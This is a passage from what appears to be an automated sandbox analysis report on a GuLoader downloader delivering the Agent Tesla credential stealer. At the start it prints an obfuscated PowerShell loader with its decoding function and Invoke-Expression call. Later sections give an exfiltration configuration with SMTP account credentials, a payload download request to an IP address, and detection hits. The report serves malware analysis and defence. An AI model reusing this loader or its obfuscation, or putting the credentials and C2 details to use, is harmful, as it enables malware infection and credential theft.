SBIn1SkA K1 oBSt1 DC M0Fu0Bl4jaEIr4NaA P2Ko3Ko0PeFBo0 S9Re0Dr0Op0TrBEm1 UANi0FaCFa0PrB T0 H2So0St9 a0Me0Co0De7 T0 F0Go0 U9No5GoCRu5DeAwa5 EEMi0 HBse1guDRe1RoCNo0Va9Kl0BdB D0Ne2La1WhDOo0PlBBo4Sk0In2 SD J1PuCPr0 HBTu0FuFSa1 EABr0 HBIn3ReABr1 F7Be1CyEDa0PiBLe4Lo6 D4 N7Pe'Ph; M&Oc(st`$HyS PaOkwSaw BoStrElkGdeBar S8 D5Ka7Sw) R Kv`$kiL IoelgtroOrpCoaMoeSudPoiBicOusEn5 P E St No;Bo} R`$GlM EaMen eiMocBauChrBliHysNot C Po=Fi HiP EyToxSyiUndUneHoscl4Ch Fa'ra0Si5Ve0LiBSu1FrC S0na0ma0 UBAb0Mi2 D5 EDRe5 TCOc'Bi;Pl`$PaXFoe Bn Uo TlTgiInt UhTesEm Fo=Ur RaPMeyChxPri CdAkeFysBr4Di Sn'Im1 UBRe1AdDDe0LiBMy1AlC B5hjDPr5veCEf'La;Li`$MaNThodknUneBlxByptulAsoPas HiDevKae MsEl0Ln3Py To=St AkPTey TxShi OdJieBasTi4He Re'Us2Sk9In0LiB c1FeAFa2TeD H0je1sk0La0Ko1CoDBr0Re1Ta0 S2Re0FiBUn3Mi9 S0Re7Ka0Ud0Co0BoASt0In1Be1Da9Se'Ca;fr`$VaN Io SnCoe PxUnpNelAvoDisGii EvUneStsHo0br0 k=AsPStyJoxAniBld HeResPe4 O U'Lu3fuD S0ge6Po0Rt1Mi1Tu9Wa3Se9Ud0Om7Li0 C0Di0 mABi0ve1Sk1St9Ba'Ha;Sn`$ArL QoligTroGrpAnatieBhdFriSkcKusUr6In Ch=Pe SpPObyMaxBiiNed BeCasBe4Op Ta'Ha4 AABl2He3My0 RFPi0Ro9 P0wa0Sk0NoBDh1coAki0 UCNo0JoBSl0 E2fo0Co9 S0Ap0Re0Bl7Sk0Is0Pl0Bi9Fr5ReCre5 AACo5SwEPh0frBUd1 OAWh1Gr8St0 D7Th1Gr8Be0Do2 H0WoB A0BrAUn0 EBSe4JaEMy5Af3Ov4OpEGa3Gu5 B3UnDSa1Ho7La1OuDFo1UnATy0NeBFa0 B3st4Fl0ut3AnCDi1CaBNo0Tr0 R1PhATu0No7Ar0Pi3Ha0FrBFo4Do0Br2Ap7Va0 U0Ni1 PASe0InBSt1SeCum0ko1Su1 aEEr3 EDFu0 MBKr1MoCSk1Fa8En0Sa7Ve0TrDVa0MaBVe1BiDSe4ge0Xe2Or3Ta0LaFoc1StCLi1AgDHn0Pr6 M0epFMi0Sa2eu3Wi3 D5Tr4Po5El4Ev2 I9Ko0jeBOu1PrAIn2TeAEn0BeBDi0 O2Ce0MeBAs0si9 T0StF B1DeAPa0ScBla2Tr8De0 I1 J1HuC F2 P8Sh1FlBTe0Sl0 U0 HDPa1 tAVi0 C7Pu0Eg1Pt0Pe0Pr3BuE D0Sc1Di0No7Fo0 G0Su1byAEp0ReBPe1HoCPa4 M6Su4Ut6Tr0Di8au0 A5 M1ViEDe4TiEOv4BuA B2Un3 H0UdF P0Bo0St0Di7 g0ooDNa1 HBTi1 ECSa0Eu7Hu1 IDSi1 LARo4WrERi4OvAue3HoDEv0VeFSp1Tu9 d1Ci9Er0Be1Af1FrCTe0Sn5 P0CrBWi1MoC N5 R6Ov5DrB R5 EA Y4 F7Ga4 D2 E4KuENo4 P6 M2 C9Ra2NoA S3PaA s4 UEMi2ElE P4 D6To3 H5Co2st7Re0So0Li1GeA I3OvEUd1SeAGr1 pCGa3Sp3va4It2Im4skESk3Pu5 P3 FBRe2De7Fo0Re0Om1BoAFu5KlDSy5EnCBa3Ov3Su4mu2 f4PaE G3fy5fa3buB A2Fo7Tr0Cr0 K1HeAar5EpDOv5TiC D3Un3Tr4Fr2Rg4 SERe3Ex5Sw3VoBTi2Vi7Fo0 X0La1FrATe5UnDTo5FlCAc3Pe3Se4At7 T4MeE S4Re6Vr3Re5Af2 P7ma0 O0 P1VeANo3quEGe1MiAIn1NaCMa3No3 A4 M7 K4Sm7 V4 I7My'Me;Am& R(Ro`$OrSEnaAdwPrw Io KrSukZoe HrUn8fi5Ph7 E)Do Al`$RoL SoGegSooScpLoaKiegrdRaiRycPlsOm6 P;Ka`$BaNAaoBen CeAlxsupFll WoArsTriudvMue Us T0An1Ru Sa=Pr SuPBeyCox Si hd veHesMa4Sa B'Da4 PA U2BeB O0 S8Re0 G1Pr0St2ce0 U7Kr0Is1ln1PhDfl0PlB R4skEBy5Je3Sc4TrEAe3By5Le3BaD F1ch7De1 VDBi1VeApn0ReBGa0Pa3Al4Em0 C3 MCHe1DoB b0Sp0Br1 oACe0ph7Ta0Ex3Su0BlBRu4Ro0Re2 R7Fo0Ma0Ro1HeABe0 WBou1UfC S0Af1 M1ChENo3InDUn0LuBBl1opCNo1ph8Sp0Mo7Sk0ToDRo0SkBSk1AlDUd4Ru0Se2Ce3Va0DaF L1maC S1 SD A0Pa6Po0TaFin0Ov2 K3 G3 I5Pe4 O5 S4 T2Bl9Ke0UlBPr1RiADi2BaAEt0 CBUn0De2 B0 UBHy0Ve9Na0 SFTi1OvASk0 KBVi2Fl8El0Pr1Wi1ReCBr2La8Ma1DoBTr0Pe0Ov0RaDSt1IwABa0Un7Cu0Mu1Tr0Ta0 M3 AETa0re1Nr0 A7Ru0Ba0Wo1 sA C0 FBFo1KnC B4Ac6Wa4Su6Dd0 j8Ph0Ho5Bl1BlESp4SpEOv4taAov3Ho6Be0HrBAn0Mi0 i0Di1Gr0Us2Vi0Ma7Fr1 AAPl0Ho6Af1AmDIn4 MEEk4ReA o2Pr0 R0Mi1pi0Fl0kr0CrBUb1 U6En1UnE I0Kr2un0Sy1Fe1 KDSh0Ra7 N1Sk8 S0GrBMa1ApDEn5MaERn5ReEYo4Sc7Un4St2Gr4SaE H4Sa6Tr2Tr9Co2 BAMo3PlAMa4FeE S2 AE R4 J6He3To5Be2Fr7Xe0Br0Pa1 PAmo3InEZe1UnA E1buC N3Sl3 d4In2Wa4DoEGe3As5Fa3 hBCo2Bl7Ci0Di0Fa1GaARe5SpDOp5ToCAn3Cr3Ni4Op7Bn4 NECy4Si6Sc3Jo5Ca2An7Cl0 A0An1NdA M3OpEIn1 RAGl1udC M3 c3Re4Ar7Ga4pr7 p4 T7Op'Ca;Sl&Sk( P`$JiSRhaSiwJowSeo Cr FkFaeJerHe8In5Te7En)Te No`$RdN ao UnOrePrx ApSalStoWosSliLavhue Os L0 R1Op;St`$LaNTyo BnJeeEnxUnpAslEro Cs LiBivTreSjs T0 C2 E Ek=Ko UpPGayTixKoiNodLaeArs k4Ga Pr'Sa4ReA F3BeDFo0ScBKn0sh3Te0Gu7ef0Pl0Of0JaFGa1anA r0Gi7Ra0Un1Fr0Th0 S4AkEDu5Ar3An4RaEDe3Na5Sa3 VDFo1 A7Ce1LuDFi1LaARg0UaBAt0 J3br4 B0 S3paCSa1PaBDa0 S0Un1KaA T0Tr7Ta0Un3 P0noBLa4Je0tu2Sk7Pr0Un0Op1TiABh0GoBTe1PeCPa0Fo1Af1arE B3NuDPh0WaBTo1ThCBa1ve8Af0Ey7Ac0 UDAt0NoBZe1 MDBa4 S0om2Ud3Fl0LoFin1blCRe1KiDSt0Ae6Sk0 AF O0Dr2 T3 A3Dr5Pl4 F5Mi4Pr2Ri9Dm0ArBUd1inADe2UnAUp0 HBfi0Co2 U0DaBAf0Cr9Ua0ImFHy1BaAfl0PiBPa2Fl8Ru0Sc1Fa1DiCLd2Ep8 S1AnBUn0Lo0Es0AtDSa1FlA S0 K7Di0Or1 P0Se0Zo3CiEAm0Ud1 B0 U7Lt0Pn0 S1TiAMo0unBWa1PaCho4Ad6Ef4Re6Ch0Sl8So0 F5 S1blEOc4 oE P4NoAIn2In3 F0tuFEn0Lu0Ev0Di7Tr0UfDCo1UnBMe1KeCPr0Sp7 P1FdD R1 NA D4FoEUd4SaAca2Sp0 K0Fe1 F0Un0Bl0HyBAd1 C6Up1 BEfr0gr2Hy0 F1 S1EnD e0Tr7Ha1Di8 S0FoBYo1enDSt5SlE K5BoDSp4La7Ub4En2De4SpESp4ne6 M2 U9 u2laADe3CaAel4KrEKa2ChEUn4No6En3 S5Pa2kl7Gl0Sc0Te1 VAPo3 CESa1 SAIm1BaCRe3Ca3Li4 T7 F4EnEEp4Ho6Be3Un5Ve2Be7Fo0Be0Fr1BeARa3SpESl1EcAUn1ErC i3Sp3Va4Fo7 O4St7 T4Bi7de'ef; B&Wa(Pa`$ DSIma pw SwMeoPhrFokkoe IrLu8Pa5Pa7Bo)Mo a`$ dN IoAfn BeChxTopNolUnoBrsBaiRevRueSlsGo0Ca2In;pr`$IcLSeo WgaaoTepSea Aealdsoipoctos F7Sn Ud=Pa SlPReyFoxOmiEndDie Ps M4Ha U'sk4ElA N2Hu3Gr0Co7Ge0CoASt1DyAKo1BaEAp1foBSl0 S0Pl0 C5Fl1MoAAs1ToDBa0Je4 F1SiBLr1KrDAn1NoALi0UpBKl1SmCAf0fa7 M0 S0Ji0St9Fl4DeE V5De3Or4CoEMe4UnA A3OvDIn0CuBGa0Ch3 P0 F7Pr0 A0As0 TFKi1 AAAm0Sh7Sc0Km1Sy0Op0ko4 S0 R2gh7Un0 M0Fe1 P8Bo0La1Ch0Br5Fo0MoBCa4 L6Di5WaERe4Ha7Me'Th;Fa& V(An`$HySAcaSowStwAcoImr HkCoe HrMo8Va5 E7 L)La Fo`$PrL BoBegCoosapDya Re BdGai rcChs S7Bo;Tv`$NoLImoDjgSpoTip BacoeModVei LcunsCo7Hi Da=sp UnP IyPaxKuiBudGueFlsJa4St Po' S4UnAPo2LaBse0Bl8Fe0Rr1Sl0Ko2 B0Gl7La0Je1Sp1ReDMe0RiB w4 S0Fo2Po7 R0Rh0Bo1Ma8 E0 l1An0 K5 U0raBGa4Fl6Sp4DyAAm2Fl3St0Si7Be0FiABi1JoASh1StESe1SkBSu0Br0Er0Sk5Kl1MoA D1myDCa0Bi4Mo1SiBkr1TiDPr1SjA R0WoBAd1 NCHe0Fe7St0Ov0Ba0ce9An4Im2Ne4 UEHi5unECa4Al7Fo'It;Sa&Lo(Ka`$OrSEkaStwKrwCooJerStkVaeSprAf8 r5 S7Br) z ja`$InLHyo BgSioKupSyaBeePodPoiVacAasCh7Fe;Sp`$DeOBeuPrdEpeVem DiYnaManOx Co= F pafBrk Fp B Ra`$ZiSpra RwEvwMaoBirPrkSue Fr K8He5Se5 T Ma`$LoSHya GwFawFooCarTik SeInrFr8Yn5St6up;Pr`$ ALGroUngyaoOppSoa PeundSuiBucInsBl7 C un=Si FyPBoyEmxsaibadUdeVasOr4Bi ac' H4UdABo3 M9Di0Pr7Ch0 m0Se1HkASt0HvBph1UdCSa1At9 N0BaBSu0SaBGa0trAre5 UADi5OrDLy4PoEVa5Re3Sa4NoEEj4DyATt2Hy3To0WiF M0Co9Ns0 I0Me0UnBFa1 UARe0MaCRe0KnBRy0No2 C0 D9Bu0Na0Fi0Th7Pa0 R0Ex0 P9 A5LnCEf5PrARa5WoEMa0CoB A1beA l1Ou8Ch0 M7Zo1 K8Be0Ha2 U0ChBSe0HjAEn0ReBFi4Ep0Om2 G7Da0Ki0Ca1Xx8Gr0Fu1 S0ge5Hu0 DBHj4Uf6Fl5NeEso4Sp2 R4SkE A5 b8Ur5MiDRe5Ke7Me4Si2 E4AkEFa5VeETr1St6Sa5 ADCr5SiEDe5TyEKa5SlEEd4Sv2Re4PtEUn5 u8 C5LeAFo4Sp7 P'Pa;Sp& S(Ap`$SlSBeaEmwtiwAioEwrSvk SeSarsn8bi5 M7Ka)li Xi`$ TL Mo HgWooSupPraKoeKod NiRecAusHk7Le;Pe`$UkL So AgunoTopFoaIde FdEviBrcSksAk8Om a=Va rePFoy BxPai Td Ce DsBe4Fe Pr'dr4SoAGe3iaD P0An5 B1ChBDe1BlEFr1SpDKn0Ce6lu1UnAId0 F7Sa0Wh0Ma0reFco4SvEWa5Mo3 B4FoENo4GeAZa2Ud3 E0lnFSy0Pa9Me0ru0An0RoBLe1laAco0 IC R0 tBGl0 B2Pr0Wh9 K0 S0bi0Ge7Co0 S0Un0Se9He5 AC S5TaASt5KoEPo0drBhj1unAJa1Pr8Tr0Va7 A1 e8bl0Fl2 S0NiBCr0brALu0StBAr4ap0Gt2Sk7Am0 B0He1Sp8Ur0Cl1 B0Ba5Pl0ChBDa4ut6Ta5DeEOv4Sl2 h4StEDa5MaBTr5 MBPe5BaBFo5TrCUn5EnB B5CaDNe5Re9 P5Er8Tm4Li2We4ChEta5 MESt1pe6Le5KoD K5toETo5HeEPo5 DEBr4 T2Pu4 CESm5 HA K4Ov7Gr'Fh;By&Ci(St`$PiSNoaMiw HwMooKor MkNeePrrMi8 A5 S7Ke) P Al`$OpLVeoJogUnoDapFjaCheSudErifocGrsEn8St;St`$ LWEfi WnFotPleGrr Hw Ie HeBidDe4be2Wi=Ma`"""Re`$vaeAqnPovSu: BLfeOShC BASnLPaABrPfaPDiD fAUdTGaAAr\ EbNilSeiPinAld NsPrmByaSag SnFei PnUdgCre Unvl\FrNLaoGrnAnpFar Bo Fc AuBerPleBom Ce GnMatRe\sas Ga Jr BaEmwDea NkNoeOvsFre A.PrdNer Dira`"""Da; d`$chLPooPigDeoKipEtaGaeIndumiEvcGrsPo9An Il=Vo FoP CyTox SiUnd PeFosKt4De Sp'In4FlARe2 G2Ti0De1 R0 N9 S0Sm1 E1SpEin0OxF K0VeBIn0MaA P0ro7Un0ReDAn1SeDWa4 LEPa5Ko3He4 LESl3Ni5 m3FoDSa1 L7Sp1XoDDy1KoABr0PrBEm0ho3 H4Gi0Un2Ac7Sk2Re1Ka4Ul0Sk2Ad8 L0Om7Ug0Pr2Re0BuBBr3Vi3Ab5Sk4Ga5Ba4Ag3StCFd0BeBAd0UnFSk0NoA T2 UFTo0Er2 T0Sk2Me2VrCTr1 P7 S1StAPr0DeB U1SiDPa4 E6Gr4CoAAt3Te9 D0He7Pa0Im0Ki1AfAUn0PiBOv1GaCGe1Fl9 T0LaBbe0 SBBa0PhAWi5 WASy5 SCma4 o7Ri'Wi;Pa&Br(Li`$PrSDaaDawGrwNaoHarBokMieNorPh8Ne5Gp7Ad) C Mi`$NiLBaoRagBioChpSea Pephd AiHjcbusBr9Ap;Ti`$SoDDeiRhsFll iognaLidPr0Fo Co=Ov VlPDeyMaxTeiBodVie CsMa4Hj S' O3Sc5Re3MeD R1Pe7Un1DuDTo1 FABe0 SBmo0Ko3To4Ml0Me3RaCBy1ReBKo0Hy0Gy1UlASp0No7Di0Th3Lo0DoB P4Sa0St2Et7Ko0Ph0Fj1 cARe0AfBKi1SqCBu0 R1Sp1MiE F3 DDSt0 IBFa1 RCFo1Ma8Fr0 s7Op0StDBe0HeB H1AnDco4Fa0 K2Ti3Se0 FFUd1SlC S1PaDRh0My6Sc0DrFFo0Br2fu3 S3Zi5Ta4Pa5 U4Pr2EtDOv0 O1An1MeEVa1bl7Ou4 C6 T4NeAUd2co2Ap0 T1Un0 L9Ke0Ph1 u1QuETr0 EF S0 CBMe0OpATr0Fr7Be0TaDBi1TeDDo4Tr2 l4CoE G5EnApl5 KEBl5FrCNo5JuA u4 H2As4 ME S4FlEKe4EtAPr3Sc9Ce0 T7Fe0Mo0Un1DiASu0UtBLa1MaCOp1Ch9Me0EvBFo0 VBUf0ChARe5 HAFo5TeDFn4Ru2va4TeEsu5Sk8Tr5SuD U5Br7od4To7Or'Sl;Fa&Fu(Pr`$AnSPiaOpwprwSeoTorSekSoeSprsu8 B5Po7Sk)my Di`$PaDHoiFesDolLaoAmaVodFo0Sp; B`$StP SokrsVeiTntLnisvoKmnEne ArNe=La`$SoLVaoFagChoFop MaSeeUndUniSicNosar.TmcphoBauMonGrtAf-Pr6Le3No9 H-Se4Un0bl2Po4 A;Sa`$ ADAsiBrs PlNoo TaTrdMo1Si Sv=Re InP uydixTiiAfdTaeGosGr4Sk Re'Au3Ju5ta3SkDSt1be7De1teD b1DvAOp0CrB I0Ku3 N4Ti0Ke3 lC v1KoBKi0In0Ta1PeAfu0Ov7Pl0bl3Fl0 ZBre4 F0In2Ne7Ar0pa0 A1PhAVo0WyBSp1ReCSk0In1Au1 SEDo3UnDKl0BoBOp1UdCFo1Ut8 G0of7Co0 CDSt0GeBSk1SyDRu4Os0Gt2Th3Di0krFAl1DeCRi1LaD A0 F6 S0 hFSk0No2 U3Da3Ze5Po4Bi5La4 O2TeD D0Aa1 R1JeE U1Bo7 D4Ba6Bl4EmAPa2 N2 T0Bu1 E0Ab9Pr0In1 N1meE P0 PFdr0PhB S0GlATr0 M7Fl0MoDMa1 RDRe4Vi2Fl4BoELr5Ku8Sv5InDPl5Un7 E4To5no5 HAVa5AsEJo5 ACFu5EsACh4Cy2Wh4saE S4TrA S3 CDDr0Fu5Va1IsBMi1NoEPr1MiDOp0 A6Ma1BlAMo0Sy7De0Su0Hy0 TF H4Fa2De4BnEPl4UdATa3VuEUd0Re1Or1BrDCo0tr7Sp1DeAIn0An7Fa0Me1ov0Ek0 E0OrBGa1JuC B4Hl7Le'se; R&Fi(Le`$ HSEua MwChwReo JrStkBaeParDi8Gr5Pe7Ar)Sp Eu`$miDapiPls Bl PoyoaMedis1Un;Da`$CaDSaiDisDelGlo naPad O2 N w=Op TrPDeyFuxCai EdTreFusCo4 d Cy'Fo4StASt3ExD P1StA A0ShBJa0GeF S0UnApo1udD N4WaEDe5Sy3Ta4arEOb3 W5Es3BeD Y1 e7In1BuDCh1SuABe0trBVi0fr3Bo4Ox0Re3 KCSy1 TB B0In0 F1noAUn0Si7He0Di3Tu0SeBIm4br0Sk2 g7Da0Pr0Pe1ToAru0 BBVa1HaC M0Vi1Ma1CoEUn3HaDCe0PhBYt1GuC B1Cl8Co0Te7St0TrDJa0FiB T1SaD F4 F0 P2Ba3Le0InFAr1HuCEx1ImDOp0No6 U0OsFMa0Pe2He3Fl3Li5De4 O5Os4Sp2Fo9Al0RaB B1TiASk2 SADr0 TBSl0 s2No0AaBSa0en9De0StFFo1 KARe0OeBph2He8as0Sm1Kr1SiCQu2gr8Po1FaBbe0 P0Li0 ADRi1PoA A0ju7ev0Va1Sp0Ru0Gl3 FEPr0Mi1Sc0La7Al0Tu0Gi1AnACi0VoB C1 FC A4Re6ch4 S6Tr0Su8Kv0Co5St1SyEGo4GrENo4KaACr2pr0Sp0Zy1Ab1CoB N0Na3Pi0LiBEf0Le0Gr0Ut7Vi1BeDpr0 O3Pe4FlEOp4FrA F2blAko0Ch7 D0Tr3St0Un7An0in0Vg1FyB D1 HAMe0 L7Am1Do8In0 SBPn1BuCMa0Ko0Ic0MuBRa4Gu7Fa4Vv2Ac4 kE N4Vi6Fa2 I9Am2DeAWe3SoAob4 VEJo2EnEsk4An6Vo3Co5Un2Ho7Me0Ga0Sy1 BAOe3KuESm1 BAWa1DoCIn3to3Ro4 S2 T4HoEFo3 D5 S2Di7Pr0In0Fo1NaASt3AaEFi1NoABa1SuCUn3 F3Pl4 a2Ar4peEfi3Kl5Co2 T7Re0Bi0In1DoAch3BaESl1 SAOu1 DC T3Su3Pu4Tr2An4PaEch3Cy5 B2Di7Kn0Re0To1teAre3AuELi1StA T1SlCFa3 J3Dm4Ga2Un4 UESe3Pr5 F2 C7 K0My0Ho1BuAPe3 HEUh1 HABe1 HC H3 s3Ch4Mi7Ov4ExEFo4Hn6Un3 S5Co2Sv7 M0St0Ca1ToAPe3ovEOm1 SA T1AfCBo3 S3Pe4Gl7Ne4Ga7Kv4St7Un' I;Ri&De( U`$BrSInaBlwPrwVaoVar Uk UeSjrKk8 R5 B7He) M Ch`$VeDStiBls Ml BounaAwdOp2Nr; A`$ CDChiSusNolStoTaaAkdRe3Fo Ub=ci NePLeyTix Ei SdTieThs N4Al Ka' I4 sA S3OvDTr1 LAHy0KeBUn0UnF T0PrA N1StDSt4Si0At2 Y7Sy0Kv0 S1Te8Un0Bi1Py0La5Cu0SyBBi4 P6bl4TrA P3 S9Ra0As7Kr0 o0 W1InAWe0DeBHa1toC B1Ph9Mo0ByBVo0MaBWh0PrARe5FlASt5GeDTr4Ra2Sm4FoAAa3ElDIc0Bu5Tr1 MBki1SoESl1 HDLa0Ny6Sa1EmAca0 S7 L0La0Dy0BjFRu4Ok2Aa4 MAPr2Kn1De1NiBSt0 RA A0StBUr0Me3 S0pr7Re0AfFSa0no0Ma4Un2Tr5 LESp4In2Bu5UpE R4Qu7 T'Th;Ba&Po( O`$ PSHaa AwTewBaoBirFikOceUdrru8Kl5Ho7 B)Br Ma`$StDAdiInsEtlCaoReaModSk3Af#Wi;""";<#Mageskifterne Tarwood Setiferous Stokvrker skillevej Saudiere #>;;function xorami ($Indbyggedes,$Magnetbelgning240) { &$Flagellanten0 (Disload9 'Fl$TeIabnInd CbPeyUngangMeeSkdPaeAgsHa B-RebhaxTeoderBa Tr$ UMsuaUng snAceCht PbTeeSilMeg Jn MiTanVegMi2Do4 T0Af ');}Function Disload9 { param([String]$Solfald); <#hovedpunkts Restemad Cataloguing Reseeking Commonality celebrating Sportsdirektr #>; For($Nonexpectant=2; $Nonexpectant -lt $Solfald.Length-1; $Nonexpectant+=(2+1+(1-1))){ <#Konditoris Endestation Kolhozy Ataghans Vinkortets #>; $Nonexplosives+=$Solfald.Substring($Nonexpectant, 1)} $Nonexplosives;};;$Flagellanten0 = Disload9 'ReIBuE aX B ';$Flagellanten1= Disload9 $Portugals;&$Flagellanten0 $Flagellanten1;<#Temperaturmaalingen Randingerne Kdvarerne Punditries Afkrslen Mocambiquernes Galleriets #>; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • MSBuild.exe (PID: 7348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "kalidot@yandex.com", "Username": "<kalidot@yandex.com>", "Password": "quality@qualityaf.com"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.driJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Temp\nse6573.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              00000000.00000002.1728501631.000000000285B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
                Click to see the 4 entries

                Sigma Signatures

                Networking

                barindex
                Sigma detected: MSBuild connects to smtp port
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.185.148.49, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49710

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                Found malware configuration
                Source: conhost.exe.5592.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "kalidot@yandex.com", "Username": "<kalidot@yandex.com>", "Password": "quality@qualityaf.com"}
                Multi AV Scanner detection for submitted file
                Source: PO_00290292.exeVirustotal: Detection: 15%Perma Link
                Source: PO_00290292.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: PO_00290292.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
                Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
                Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mfMeuTZ127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 172.96.14.41Cache-Control: no-cache
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
